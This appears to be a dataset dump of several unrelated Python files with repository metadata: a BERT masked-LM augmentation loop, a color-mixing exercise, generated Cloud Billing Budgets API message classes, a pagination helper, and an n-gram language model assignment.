            otherwise only after every 10th epoch.

    Fixes vs. the original:
        * the augmented CSV is now closed (via ``with``) before it is
          snapshot-copied, so buffered rows are no longer lost;
        * dead assignments (``train_examples = None``, ``global_step``,
          the misspelled ``predctions`` copy) were removed.
    """
    # Map task name -> processor; add your own dataset/processor pairs here.
    processors = {
        "toxic": AugProcessor
    }
    task_name = args.task_name
    if task_name not in processors:
        raise ValueError("Task not found: %s" % (task_name))
    args.data_dir = os.path.join(args.data_dir, task_name)
    args.output_dir = os.path.join(args.output_dir, task_name)
    # Seed every RNG in play so augmentation runs are reproducible.
    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    os.makedirs(args.output_dir, exist_ok=True)
    processor = processors[task_name]()
    label_list = processor.get_labels(task_name)
    tokenizer = BertTokenizer.from_pretrained(args.bert_model, do_lower_case=args.do_lower_case)
    train_examples = processor.get_train_examples(args.data_dir)
    num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)

    def load_model(model_name):
        # Fine-tuned checkpoints live under the pytorch_pretrained_bert cache dir.
        weights_path = os.path.join(PYTORCH_PRETRAINED_BERT_CACHE, model_name)
        return torch.load(weights_path)

    MODEL_name = "{}/BertForMaskedLM_aug{}_epoch_3".format(task_name.lower(), task_name.lower())
    model = load_model(MODEL_name)
    model.cuda()

    # The optimizer is only needed by the (currently disabled) fine-tuning
    # pass inside the epoch loop; it is kept so that pass can be re-enabled
    # without further changes.
    param_optimizer = list(model.named_parameters())
    no_decay = ['bias', 'gamma', 'beta']
    optimizer_grouped_parameters = [
        {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.01},
        {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.0}
    ]
    t_total = num_train_steps
    optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate,
                         warmup=args.warmup_proportion, t_total=t_total)

    train_features = convert_examples_to_features(
        train_examples, label_list, args.max_seq_length, tokenizer)
    logger.info("***** Running training *****")
    logger.info(" Num examples = %d", len(train_examples))
    logger.info(" Batch size = %d", args.train_batch_size)
    logger.info(" Num steps = %d", num_train_steps)
    all_init_ids = torch.tensor([f.init_ids for f in train_features], dtype=torch.long)
    all_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)
    all_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)
    all_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)
    all_masked_lm_labels = torch.tensor([f.masked_lm_labels for f in train_features], dtype=torch.long)
    train_data = TensorDataset(all_init_ids, all_input_ids, all_input_mask, all_segment_ids, all_masked_lm_labels)
    print(train_data)
    train_sampler = RandomSampler(train_data)
    train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
    save_model_dir = os.path.join(PYTORCH_PRETRAINED_BERT_CACHE, task_name)
    if not os.path.exists(save_model_dir):
        os.mkdir(save_model_dir)
    MASK_id = tokenizer.convert_tokens_to_ids(['[MASK]'])[0]
    origin_train_path = os.path.join(args.output_dir, "train_origin.csv")
    save_train_path = os.path.join(args.output_dir, "train.csv")
    shutil.copy(origin_train_path, save_train_path)
    for e in trange(int(args.num_train_epochs), desc="Epoch"):
        # Disabled fine-tuning pass; re-enable to keep training while augmenting.
        '''
        avg_loss = 0
        for step, batch in enumerate(train_dataloader):
            model.train()
            batch = tuple(t.cuda() for t in batch)
            _, input_ids, input_mask, segment_ids, masked_ids = batch
            loss = model(input_ids, segment_ids, input_mask, masked_ids)
            loss.backward()
            avg_loss += loss.item()
            optimizer.step()
            model.zero_grad()
            if (step + 1) % 50 == 0:
                print("avg_loss: {}".format(avg_loss / 50))
                avg_loss = 0
        '''
        # Start every epoch from the pristine file, then append augmented rows.
        shutil.copy(origin_train_path, save_train_path)
        # BUG FIX: `with` guarantees the CSV is flushed and closed before the
        # snapshot copy below (the original leaked the handle and could copy
        # a partially-written file).
        with open(save_train_path, 'a', encoding='UTF-8') as save_train_file:
            csv_writer = csv.writer(save_train_file, delimiter=',')
            for step, batch in enumerate(train_dataloader):
                model.eval()
                batch = tuple(t.cuda() for t in batch)
                init_ids, _, input_mask, segment_ids, masked_ids = batch
                # Number of real (non-padding) tokens per example.
                input_lens = [sum(mask).item() for mask in input_mask]
                # Pick ~1/7 of the positions (at least 2) to mask per example.
                masked_idx = np.squeeze([np.random.randint(0, l, max(l//7, 2)) for l in input_lens])
                for ids, idx in zip(init_ids, masked_idx):
                    ids[idx] = MASK_id
                predictions = model(init_ids, segment_ids, input_mask)
                print(step)
                for ids, idx, preds, seg in zip(init_ids, masked_idx, predictions, segment_ids):
                    # Top-1 replacement at every masked position.
                    pred = torch.argsort(preds)[:, -1][idx]
                    ids[idx] = pred
                    pred_str = tokenizer.convert_ids_to_tokens(ids.cpu().numpy())
                    pred_str = remove_wordpiece(pred_str)
                    csv_writer.writerow([pred_str, seg[0].item()])
                    # Top-2 replacement yields a second, distinct variant.
                    pred = torch.argsort(preds)[:, -2][idx]
                    ids[idx] = pred
                    pred_str = tokenizer.convert_ids_to_tokens(ids.cpu().numpy())
                    pred_str = remove_wordpiece(pred_str)
                    csv_writer.writerow([pred_str, seg[0].item()])
        bak_train_path = os.path.join(args.output_dir, "train_epoch_{}.csv".format(e))
        shutil.copy(save_train_path, bak_train_path)
        if save_every_epoch:
            save_model_name = "BertForMaskedLM_" + task_name + "_epoch_" + str(e + 1)
            torch.save(model, os.path.join(save_model_dir, save_model_name))
        elif (e + 1) % 10 == 0:
            save_model_name = "BertForMaskedLM_aug" + task_name + "_epoch_" + str(e + 1)
            torch.save(model, os.path.join(save_model_dir, save_model_name))
if __name__ == "__main__":
main() | [
"roylandstinger@gmail.com"
] | roylandstinger@gmail.com |
ae246fba8be299e7a03b72db632f82a55e5f6415 | 876e4043d5f68b71cdfd8796c85f502710f9f542 | /Colores.py | bc315012a8fbd9d5fd71df5be4e3dda44688a78a | [] | no_license | Edgarlv/Tarea_04 | cb6a36644002fa3ae1f951438bd132105555de63 | 31283587997702ab33ae7e19bca256ac23e90b86 | refs/heads/master | 2021-01-18T20:14:52.962230 | 2016-09-18T22:37:39 | 2016-09-18T22:37:39 | 68,458,853 | 0 | 0 | null | 2016-09-17T15:00:05 | 2016-09-17T15:00:05 | null | UTF-8 | Python | false | false | 732 | py | #encoding: UTF-8
#author: Edgar Eduardo Alvarado Duran
#Problema 3
def calcularColores(a, b):
    """Return the secondary color produced by mixing primaries *a* and *b*.

    Expects the lowercase Spanish names "rojo", "azul" and "amarillo", in
    either order.  For any other pair it prints "error" and returns None,
    matching the original behavior.
    """
    mezcla = {a, b}
    if mezcla == {"rojo", "azul"}:
        return "Morado"
    if mezcla == {"rojo", "amarillo"}:
        return "Naranja"
    if mezcla == {"azul", "amarillo"}:
        return "Verde"
    print("error")
def main():
    """Prompt for two primary colors and print the resulting mix.

    Fix: the inputs are normalized to lowercase before calling
    calcularColores(), which only matches lowercase names — the original
    computed the lowercase copies (a2/b2) but passed the raw strings, so
    "Rojo" or "AZUL" always fell through to the error branch.
    """
    a = raw_input("¿Que color quieres?")  # raw_input: this script targets Python 2
    b = raw_input("¿Que otro color quieres?")
    a2 = a.lower()
    b2 = b.lower()
    print ("El color entre", a, "y", b," forma el color:",calcularColores(a2,b2))
main()
"noreply@github.com"
] | Edgarlv.noreply@github.com |
66a9052b381170d325564e1f868643a4dbafd533 | ad5d38fce4785037c108186f17eb1c64380355ef | /sddsd/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/billingbudgets/v1beta1/billingbudgets_v1beta1_messages.py | 703342bc274d39c84cc7f65280b83732457e9420 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | saranraju90/multik8s | 75864b605a139ddb7947ed4de4ae8466bdd49acb | 428576dedef7bb9cd6516e2c1ab2714581e1137c | refs/heads/master | 2023-03-03T21:56:14.383571 | 2021-02-20T14:56:42 | 2021-02-20T14:56:42 | 339,665,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,295 | py | """Generated message classes for billingbudgets version v1beta1.
The Cloud Billing Budget API stores Cloud Billing budgets, which define a
budget plan and the rules to execute as spend is tracked against that plan.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'billingbudgets'
class BillingbudgetsBillingAccountsBudgetsCreateRequest(_messages.Message):
  r"""A BillingbudgetsBillingAccountsBudgetsCreateRequest object.

  Fields:
    googleCloudBillingBudgetsV1beta1CreateBudgetRequest: A
      GoogleCloudBillingBudgetsV1beta1CreateBudgetRequest resource to be
      passed as the request body.
    parent: Required. The name of the billing account to create the budget
      in. Values are of the form `billingAccounts/{billingAccountId}`.
  """

  # Field numbers (1, 2) are wire-format tags; never renumber them.
  googleCloudBillingBudgetsV1beta1CreateBudgetRequest = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1CreateBudgetRequest', 1)
  parent = _messages.StringField(2, required=True)
class BillingbudgetsBillingAccountsBudgetsDeleteRequest(_messages.Message):
  r"""A BillingbudgetsBillingAccountsBudgetsDeleteRequest object.

  Fields:
    name: Required. Name of the budget to delete. Values are of the form
      `billingAccounts/{billingAccountId}/budgets/{budgetId}`.
  """

  # Field number 1 is the wire-format tag; never renumber it.
  name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsGetRequest(_messages.Message):
  r"""A BillingbudgetsBillingAccountsBudgetsGetRequest object.

  Fields:
    name: Required. Name of budget to get. Values are of the form
      `billingAccounts/{billingAccountId}/budgets/{budgetId}`.
  """

  # Field number 1 is the wire-format tag; never renumber it.
  name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsListRequest(_messages.Message):
  r"""A BillingbudgetsBillingAccountsBudgetsListRequest object.

  Fields:
    pageSize: Optional. The maximum number of budgets to return per page. The
      default and maximum value are 100.
    pageToken: Optional. The value returned by the last `ListBudgetsResponse`
      which indicates that this is a continuation of a prior `ListBudgets`
      call, and that the system should return the next page of data.
    parent: Required. Name of billing account to list budgets under. Values
      are of the form `billingAccounts/{billingAccountId}`.
  """

  # Field numbers are wire-format tags; never renumber them.
  pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
  pageToken = _messages.StringField(2)
  parent = _messages.StringField(3, required=True)
class BillingbudgetsBillingAccountsBudgetsPatchRequest(_messages.Message):
  r"""A BillingbudgetsBillingAccountsBudgetsPatchRequest object.

  Fields:
    googleCloudBillingBudgetsV1beta1UpdateBudgetRequest: A
      GoogleCloudBillingBudgetsV1beta1UpdateBudgetRequest resource to be
      passed as the request body.
    name: Output only. Resource name of the budget. The resource name implies
      the scope of a budget. Values are of the form
      `billingAccounts/{billingAccountId}/budgets/{budgetId}`.
  """

  # Field numbers are wire-format tags; never renumber them.
  googleCloudBillingBudgetsV1beta1UpdateBudgetRequest = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1UpdateBudgetRequest', 1)
  name = _messages.StringField(2, required=True)
class GoogleCloudBillingBudgetsV1beta1AllUpdatesRule(_messages.Message):
  r"""AllUpdatesRule defines notifications that are sent based on budget
  spend and thresholds.

  Fields:
    disableDefaultIamRecipients: Optional. When set to true, disables default
      notifications sent when a threshold is exceeded. Default notifications
      are sent to those with Billing Account Administrator and Billing
      Account User IAM roles for the target account.
    monitoringNotificationChannels: Optional. Targets to send notifications
      to when a threshold is exceeded. This is in addition to default
      recipients who have billing account IAM roles. The value is the full
      REST resource name of a monitoring notification channel with the form
      `projects/{project_id}/notificationChannels/{channel_id}`. A maximum of
      5 channels are allowed. See https://cloud.google.com/billing/docs/how-
      to/budgets-notification-recipients for more details.
    pubsubTopic: Optional. The name of the Pub/Sub topic where budget related
      messages will be published, in the form
      `projects/{project_id}/topics/{topic_id}`. Updates are sent at regular
      intervals to the topic. The topic needs to be created before the budget
      is created; see https://cloud.google.com/billing/docs/how-
      to/budgets#manage-notifications for more details. Caller is expected to
      have `pubsub.topics.setIamPolicy` permission on the topic when it's set
      for a budget, otherwise, the API call will fail with PERMISSION_DENIED.
      See https://cloud.google.com/billing/docs/how-to/budgets-programmatic-
      notifications for more details on Pub/Sub roles and permissions.
    schemaVersion: Optional. Required when AllUpdatesRule.pubsub_topic is
      set. The schema version of the notification sent to
      AllUpdatesRule.pubsub_topic. Only "1.0" is accepted. It represents the
      JSON schema as defined in https://cloud.google.com/billing/docs/how-
      to/budgets-programmatic-notifications#notification_format.
  """

  # Field numbers are wire-format tags; never renumber them.
  disableDefaultIamRecipients = _messages.BooleanField(1)
  monitoringNotificationChannels = _messages.StringField(2, repeated=True)
  pubsubTopic = _messages.StringField(3)
  schemaVersion = _messages.StringField(4)
class GoogleCloudBillingBudgetsV1beta1Budget(_messages.Message):
  r"""A budget is a plan that describes what you expect to spend on Cloud
  projects, plus the rules to execute as spend is tracked against that plan,
  (for example, send an alert when 90% of the target spend is met).
  Currently all plans are monthly budgets so the usage period(s) tracked are
  implied (calendar months of usage back-to-back).

  Fields:
    allUpdatesRule: Optional. Rules to apply to notifications sent based on
      budget spend and thresholds.
    amount: Required. Budgeted amount.
    budgetFilter: Optional. Filters that define which resources are used to
      compute the actual spend against the budget.
    displayName: User data for display name in UI. Validation: <= 60 chars.
    etag: Optional. Etag to validate that the object is unchanged for a
      read-modify-write operation. An empty etag will cause an update to
      overwrite other changes.
    name: Output only. Resource name of the budget. The resource name implies
      the scope of a budget. Values are of the form
      `billingAccounts/{billingAccountId}/budgets/{budgetId}`.
    thresholdRules: Optional. Rules that trigger alerts (notifications of
      thresholds being crossed) when spend exceeds the specified percentages
      of the budget.
  """

  # Field numbers are wire-format tags; never renumber them.
  allUpdatesRule = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1AllUpdatesRule', 1)
  amount = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1BudgetAmount', 2)
  budgetFilter = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Filter', 3)
  displayName = _messages.StringField(4)
  etag = _messages.StringField(5)
  name = _messages.StringField(6)
  thresholdRules = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1ThresholdRule', 7, repeated=True)
class GoogleCloudBillingBudgetsV1beta1BudgetAmount(_messages.Message):
  r"""The budgeted amount for each usage period.

  Fields:
    lastPeriodAmount: Use the last period's actual spend as the budget for
      the present period.
    specifiedAmount: A specified amount to use as the budget.
      `currency_code` is optional. If specified when creating a budget, it
      must match the currency of the billing account. If specified when
      updating a budget, it must match the existing budget currency_code.
      The `currency_code` is provided on output.
  """

  # Exactly one of the two fields is expected to be set (oneof-style choice).
  # Field numbers are wire-format tags; never renumber them.
  lastPeriodAmount = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1LastPeriodAmount', 1)
  specifiedAmount = _messages.MessageField('GoogleTypeMoney', 2)
class GoogleCloudBillingBudgetsV1beta1CreateBudgetRequest(_messages.Message):
  r"""Request for CreateBudget

  Fields:
    budget: Required. Budget to create.
  """

  # Field number 1 is the wire-format tag; never renumber it.
  budget = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Budget', 1)
class GoogleCloudBillingBudgetsV1beta1Filter(_messages.Message):
r"""A filter for a budget, limiting the scope of the cost to calculate.
Enums:
CreditTypesTreatmentValueValuesEnum: Optional. If not set, default
behavior is `INCLUDE_ALL_CREDITS`.
Messages:
LabelsValue: Optional. A single label and value pair specifying that usage
from only this set of labeled resources should be included in the
budget. Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
Fields:
creditTypes: Optional. If Filter.credit_types_treatment is
INCLUDE_SPECIFIED_CREDITS, this is a list of credit types to be
subtracted from gross cost to determine the spend for threshold
calculations. If Filter.credit_types_treatment is **not**
INCLUDE_SPECIFIED_CREDITS, this field must be empty. See [a list of
acceptable credit type
values](https://cloud.google.com/billing/docs/how-to/export-data-
bigquery-tables#credits-type).
creditTypesTreatment: Optional. If not set, default behavior is
`INCLUDE_ALL_CREDITS`.
labels: Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
projects: Optional. A set of projects of the form `projects/{project}`,
specifying that usage from only this set of projects should be included
in the budget. If omitted, the report will include all usage for the
billing account, regardless of which project the usage occurred on. Only
zero or one project can be specified currently.
services: Optional. A set of services of the form `services/{service_id}`,
specifying that usage from only this set of services should be included
in the budget. If omitted, the report will include usage for all the
services. The service names are available through the Catalog API:
https://cloud.google.com/billing/v1/how-tos/catalog-api.
subaccounts: Optional. A set of subaccounts of the form
`billingAccounts/{account_id}`, specifying that usage from only this set
of subaccounts should be included in the budget. If a subaccount is set
to the name of the parent account, usage from the parent account will be
included. If omitted, the report will include usage from the parent
account and all subaccounts, if they exist.
"""
class CreditTypesTreatmentValueValuesEnum(_messages.Enum):
r"""Optional. If not set, default behavior is `INCLUDE_ALL_CREDITS`.
Values:
CREDIT_TYPES_TREATMENT_UNSPECIFIED: <no description>
INCLUDE_ALL_CREDITS: All types of credit are subtracted from the gross
cost to determine the spend for threshold calculations.
EXCLUDE_ALL_CREDITS: All types of credit are added to the net cost to
determine the spend for threshold calculations.
INCLUDE_SPECIFIED_CREDITS: Credit types specified in the credit_types
field are subtracted from the gross cost to determine the spend for
threshold calculations.
"""
CREDIT_TYPES_TREATMENT_UNSPECIFIED = 0
INCLUDE_ALL_CREDITS = 1
EXCLUDE_ALL_CREDITS = 2
INCLUDE_SPECIFIED_CREDITS = 3
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not allowed.
If omitted, the report will include all labeled and unlabeled usage.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2, repeated=True)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
creditTypes = _messages.StringField(1, repeated=True)
creditTypesTreatment = _messages.EnumField('CreditTypesTreatmentValueValuesEnum', 2)
labels = _messages.MessageField('LabelsValue', 3)
projects = _messages.StringField(4, repeated=True)
services = _messages.StringField(5, repeated=True)
subaccounts = _messages.StringField(6, repeated=True)
class GoogleCloudBillingBudgetsV1beta1LastPeriodAmount(_messages.Message):
r"""Describes a budget amount targeted to last period's spend. At this time,
the amount is automatically 100% of last period's spend; that is, there are
no other options yet. Future configuration will be described here (for
example, configuring a percentage of last period's spend).
"""
class GoogleCloudBillingBudgetsV1beta1ListBudgetsResponse(_messages.Message):
r"""Response for ListBudgets
Fields:
budgets: List of the budgets owned by the requested billing account.
nextPageToken: If not empty, indicates that there may be more budgets that
match the request; this value should be passed in a new
`ListBudgetsRequest`.
"""
budgets = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Budget', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class GoogleCloudBillingBudgetsV1beta1ThresholdRule(_messages.Message):
r"""ThresholdRule contains a definition of a threshold which triggers an
alert (a notification of a threshold being crossed) to be sent when spend
goes above the specified amount. Alerts are automatically e-mailed to users
with the Billing Account Administrator role or the Billing Account User
role. The thresholds here have no effect on notifications sent to anything
configured under `Budget.all_updates_rule`.
Enums:
SpendBasisValueValuesEnum: Optional. The type of basis used to determine
if spend has passed the threshold. Behavior defaults to CURRENT_SPEND if
not set.
Fields:
spendBasis: Optional. The type of basis used to determine if spend has
passed the threshold. Behavior defaults to CURRENT_SPEND if not set.
thresholdPercent: Required. Send an alert when this threshold is exceeded.
This is a 1.0-based percentage, so 0.5 = 50%. Validation: non-negative
number.
"""
class SpendBasisValueValuesEnum(_messages.Enum):
r"""Optional. The type of basis used to determine if spend has passed the
threshold. Behavior defaults to CURRENT_SPEND if not set.
Values:
BASIS_UNSPECIFIED: Unspecified threshold basis.
CURRENT_SPEND: Use current spend as the basis for comparison against the
threshold.
FORECASTED_SPEND: Use forecasted spend for the period as the basis for
comparison against the threshold.
"""
BASIS_UNSPECIFIED = 0
CURRENT_SPEND = 1
FORECASTED_SPEND = 2
spendBasis = _messages.EnumField('SpendBasisValueValuesEnum', 1)
thresholdPercent = _messages.FloatField(2)
class GoogleCloudBillingBudgetsV1beta1UpdateBudgetRequest(_messages.Message):
r"""Request for UpdateBudget
Fields:
budget: Required. The updated budget object. The budget to update is
specified by the budget name in the budget.
updateMask: Optional. Indicates which fields in the provided budget to
update. Read-only fields (such as `name`) cannot be changed. If this is
not provided, then only fields with non-default values from the request
are updated. See https://developers.google.com/protocol-
buffers/docs/proto3#default for more details about default values.
"""
budget = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Budget', 1)
updateMask = _messages.StringField(2)
class GoogleProtobufEmpty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
class GoogleTypeMoney(_messages.Message):
r"""Represents an amount of money with its currency type.
Fields:
currencyCode: The three-letter currency code defined in ISO 4217.
nanos: Number of nano (10^-9) units of the amount. The value must be
between -999,999,999 and +999,999,999 inclusive. If `units` is positive,
`nanos` must be positive or zero. If `units` is zero, `nanos` can be
positive, zero, or negative. If `units` is negative, `nanos` must be
negative or zero. For example $-1.75 is represented as `units`=-1 and
`nanos`=-750,000,000.
units: The whole units of the amount. For example if `currencyCode` is
`"USD"`, then 1 unit is one US dollar.
"""
currencyCode = _messages.StringField(1)
nanos = _messages.IntegerField(2, variant=_messages.Variant.INT32)
units = _messages.IntegerField(3)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| [
"saranraju90@gmail.com"
] | saranraju90@gmail.com |
4e3448bfeb4bf56e2ff41fc71a1727b619f401e6 | 526b6454565583700866463e46f66ede67165e2b | /expenses/pagination.py | d231586502537a64f68fbb878914834860e78b17 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | thangadurairajapandiyan/django-expenses | a0f04ac41d1b02be82642a084545a2b356fd5a59 | 4a463052a67ac080427857d3fec16cf78eb70c3b | refs/heads/master | 2023-03-30T04:24:01.096399 | 2021-03-31T20:30:17 | 2021-03-31T20:30:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,126 | py | # Pretty Pagination
# Copyright © 2018-2021, Chris Warrick.
# All rights reserved.
# License: 3-clause BSD
from itertools import zip_longest
def pagination(num, maxpage):
    """Build a compact page list for page `num` of `maxpage` pages.

    Shows the current page with its neighbours plus the first and last
    pages, inserting "..." wherever more than one page is hidden.
    """
    if maxpage <= 5:
        # Few enough pages to simply show them all.
        return list(range(1, maxpage + 1))
    # A three-page window around the current page, clamped at the ends.
    if num == 1:
        window = {1, 2, 3}
    elif num == maxpage:
        window = {num - 2, num - 1, num}
    else:
        window = {num - 1, num, num + 1}
    window |= {1, maxpage}
    anchors = [p for p in sorted(window) if 0 < p <= maxpage]
    result = []
    for left, right in zip(anchors, anchors[1:] + [None]):
        result.append(left)
        if right is None:
            continue
        gap = right - left
        if gap == 2:
            # Only one page is hidden; show it rather than an ellipsis.
            result.append(left + 1)
        elif gap > 2:
            result.append("...")
    return result
if __name__ == "__main__":
    # Visual smoke test: print the pagination for every page of a 15-page set.
    last_page = 15
    print("Pages:", last_page)
    for page in range(1, last_page + 1):
        print(page, pagination(page, last_page), sep="\t")
| [
"kwpolska@gmail.com"
] | kwpolska@gmail.com |
72e5684f277e58025c9c50f2581ad6e89346988e | a9ec8521eff0d44683570115705139ed7cd00882 | /base_LM.py | e4ec39f617487113fa8d98dd6f7a85508a35d71e | [] | no_license | TheSuguser/problem | 1b8727f986857ecc89f13b19d19770fd6dfd2804 | 81cf6c1c87b971c7c33946afe77408e8eb18be39 | refs/heads/master | 2021-08-11T16:45:15.240045 | 2017-11-13T23:38:01 | 2017-11-13T23:38:01 | 108,463,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,999 | py | #! SETUP 1
import sys, os
_snlp_book_dir = "../../../../"
sys.path.append(_snlp_book_dir)
import statnlpbook.lm as lm
import statnlpbook.ohhla as ohhla
import math
import numpy as np
import matplotlib.pyplot as plt
#! SETUP 2
# Locate the OHHLA lyrics corpus and flatten each split into a word list.
_snlp_train_dir = _snlp_book_dir + "/data/ohhla/train"
_snlp_dev_dir = _snlp_book_dir + "/data/ohhla/dev"
_snlp_train_song_words = ohhla.words(ohhla.load_all_songs(_snlp_train_dir))
_snlp_dev_song_words = ohhla.words(ohhla.load_all_songs(_snlp_dev_dir))
# Sanity check that the full training corpus was loaded.
assert(len(_snlp_train_song_words)==1041496)
# Define Interpolated language model
class InterpolatedLM(lm.LanguageModel):
    """Linear interpolation of two language models.

    P(w | h) = alpha * P_main(w | h) + (1 - alpha) * P_backoff(w | h)
    The model shares the main model's vocabulary and n-gram order.
    """

    def __init__(self, main, backoff, alpha):
        super().__init__(main.vocab, main.order)
        self.main = main
        self.backoff = backoff
        self.alpha = alpha

    def probability(self, word, *history):
        p_main = self.main.probability(word, *history)
        p_backoff = self.backoff.probability(word, *history)
        return self.alpha * p_main + (1.0 - self.alpha) * p_backoff
# Deal with raw data
# Replace rare words with an OOV token, then train n-gram models on the result.
oov_train = lm.inject_OOVs(_snlp_train_song_words)
bigram = lm.NGramLM(oov_train, 2)
unigram = lm.NGramLM(oov_train,1)
trigram = lm.NGramLM(oov_train,3)  # NOTE(review): trained but not used below
# alpha = 0.7171 matches the best value found by the sweep at the bottom of the file.
inter_lm = InterpolatedLM(bigram, unigram, 0.7171)
oov_vocab = set(oov_train)
#Create Language model
def create_lm(vocab):
    """
    Return an instance of `lm.LanguageModel` defined over the given vocabulary.

    Args:
        vocab: the vocabulary the LM should be defined over. It is the union
            of the training and test words.
    Returns:
        a language model, instance of `lm.LanguageModel`.
    """
    # Words the trained model has never seen get routed through the OOV token.
    unseen_words = vocab - oov_vocab
    return lm.OOVAwareLM(inter_lm, unseen_words)
#! SETUP 3
_snlp_test_dir = _snlp_book_dir + "/data/ohhla/dev"
#! SETUP 4
# Build the combined vocabulary (train + dev + test) and the final model.
_snlp_test_song_words = ohhla.words(ohhla.load_all_songs(_snlp_test_dir))
_snlp_test_vocab = set(_snlp_test_song_words)
_snlp_dev_vocab = set(_snlp_dev_song_words)
_snlp_train_vocab = set(_snlp_train_song_words)
_snlp_vocab = _snlp_test_vocab | _snlp_train_vocab | _snlp_dev_vocab
_snlp_lm = create_lm(_snlp_vocab)
#! ASSESSMENT 1
# Check the model is a proper distribution: at a few token positions, the
# probabilities over the whole vocabulary should sum to ~1.
_snlp_test_token_indices = [100, 1000, 10000]
_eps = 0.000001
for i in _snlp_test_token_indices:
    result = sum([_snlp_lm.probability(word, *_snlp_test_song_words[i-_snlp_lm.order+1:i]) for word in _snlp_vocab])
    print("Sum: {sum}, ~1: {approx_1}, <=1: {leq_1}".format(sum=result,
                                                            approx_1=abs(result - 1.0) < _eps,
                                                            leq_1=result - _eps <= 1.0))
#! ASSESSMENT 2
# NOTE(review): "Perlexity" is a typo in the output label (left unchanged here).
print("Perlexity:", lm.perplexity(_snlp_lm, _snlp_test_song_words))
# Test parameter
# Sweep the interpolation weight alpha over [0, 1] and report the value that
# minimises perplexity on the test words.
step = 100
alpha_range = np.linspace(0, 1, step)
perp = np.zeros(step)
for i in range(step):
    print(i)
    inter_lm = InterpolatedLM(bigram,unigram, alpha_range[i])
    _snlp_lm = create_lm(_snlp_test_vocab)
    perp[i] = lm.perplexity(_snlp_lm, _snlp_test_song_words)
